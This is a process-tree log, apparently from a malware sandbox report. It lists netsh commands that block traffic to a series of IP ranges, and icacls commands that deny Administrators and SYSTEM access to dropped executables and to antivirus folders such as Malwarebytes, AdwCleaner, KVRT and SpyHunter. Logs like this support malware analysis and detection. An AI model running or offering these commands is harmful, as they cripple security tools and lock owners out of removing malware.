C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.2555⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.2555⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.2555⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.2484⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.2485⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.2555⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.2555⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.2555⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.2555⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.1134⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.1135⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.1134⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.1135⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.724⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.725⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.724⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.725⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.964⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.965⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.964⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.965⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.814⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.815⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.814⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.815⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.224⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.225⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.224⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.225⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.1864⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.1865⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.1864⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.1865⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.1694⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.1695⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.1694⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.1695⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.114⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.115⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.114⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.115⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.2364⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.2365⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.2364⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.2365⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.614⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.615⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.614⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.615⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.1024⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.1025⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.1024⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.1025⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.1514⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.1515⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.1514⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.1515⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.264⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.265⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.264⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.265⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.2304⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.2305⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.2304⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.2305⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny System:(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny система:(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny Администраторы:(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny System:(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny система:(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny Администраторы:(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny System:(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny System:(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny Администраторы:(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny System:(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Администраторы:(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Администраторы:(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny System:(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny Администраторы:(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny System:(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny Администраторы:(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny System:(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
